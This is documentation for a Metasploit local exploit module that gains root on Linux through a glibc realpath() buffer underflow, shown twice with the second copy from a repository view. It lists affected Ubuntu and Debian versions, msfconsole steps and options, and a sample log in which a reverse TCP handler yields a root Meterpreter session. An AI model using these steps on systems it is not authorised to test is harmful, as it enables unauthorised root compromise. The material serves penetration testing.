documentation/modules/exploit/linux/local/glibc_realpath_priv_esc.md

## Description

  This module attempts to gain root privileges on Linux systems by abusing
  a vulnerability in GNU C Library (glibc) version 2.26 and prior.

  This module uses halfdog's RationalLove exploit to exploit a buffer
  underflow in glibc realpath() and create a SUID root shell. The exploit
  has offsets for glibc versions `2.23-0ubuntu9` and `2.24-11+deb9u1`.

  The target system must have unprivileged user namespaces enabled.


## Vulnerable Application

  This module has been tested successfully on:

  * Ubuntu Linux 16.04.3 (x86_64) with glibc version `2.23-0ubuntu9`
  * Debian 9.0 (x86_64) with glibc version `2.24-11+deb9u1`


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/glibc_realpath_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **SESSION**

  Which session to use, which can be viewed with `sessions`

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)

  **COMPILE**

  Options: `Auto` `True` `False` (default: `Auto`)

  Whether the exploit should be live compiled with `gcc` on the target system,
  or uploaded as a pre-compiled binary.

  `Auto` will first determine if `gcc` is installed to compile live on the system,
  and fall back to uploading a pre-compiled binary.


## Scenarios

  ```
  msf5 > use exploit/linux/local/glibc_realpath_priv_esc 
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/glibc_realpath_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ...
  [*] Writing '/tmp/.Piya56UZVV' (207 bytes) ...
  [*] Launching exploit...
  [*] Sending stage (853256 bytes) to 172.16.191.171

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.171
  OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  ```
Add documentation 2018-05-26 21:51:45 +00:00			`## Description`

			`This module attempts to gain root privileges on Linux systems by abusing`
			`a vulnerability in GNU C Library (glibc) version 2.26 and prior.`

			`This module uses halfdog's RationalLove exploit to exploit a buffer`
			`underflow in glibc realpath() and create a SUID root shell. The exploit`
			has offsets for glibc versions `2.23-0ubuntu9` and `2.24-11+deb9u1`.

			`The target system must have unprivileged user namespaces enabled.`


			`## Vulnerable Application`

			`This module has been tested successfully on:`

			* Ubuntu Linux 16.04.3 (x86_64) with glibc version `2.23-0ubuntu9`
			* Debian 9.0 (x86_64) with glibc version `2.24-11+deb9u1`


			`## Verification Steps`

			1. Start `msfconsole`
			`2. Get a session`
			3. `use exploit/linux/local/glibc_realpath_priv_esc`
			4. `set SESSION [SESSION]`
			5. `check`
			6. `run`
			`7. You should get a new root session`


			`## Options`

			`SESSION`

			Which session to use, which can be viewed with `sessions`

			`WritableDir`

			A writable directory file system path. (default: `/tmp`)

			`COMPILE`

			Options: `Auto` `True` `False` (default: `Auto`)

			Whether the exploit should be live compiled with `gcc` on the target system,
			`or uploaded as a pre-compiled binary.`

			`Auto` will first determine if `gcc` is installed to compile live on the system,
			`and fall back to uploading a pre-compiled binary.`


			`## Scenarios`

			```
			`msf5 > use exploit/linux/local/glibc_realpath_priv_esc`
			`msf5 exploit(linux/local/glibc_realpath_priv_esc) > set session 1`
			`session => 1`
			`msf5 exploit(linux/local/glibc_realpath_priv_esc) > run`

			`[*] Started reverse TCP handler on 172.16.191.188:4444`
			`[*] Writing '/tmp/.DhRxy0FQR.c' (35470 bytes) ...`
			`[*] Writing '/tmp/.Piya56UZVV' (207 bytes) ...`
			`[*] Launching exploit...`
			`[*] Sending stage (853256 bytes) to 172.16.191.171`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 172.16.191.171`
			`OS : Ubuntu 16.04 (Linux 4.10.0-28-generic)`
			`Architecture : x64`
			`BuildTuple : i486-linux-musl`
			`Meterpreter : x86/linux`
			```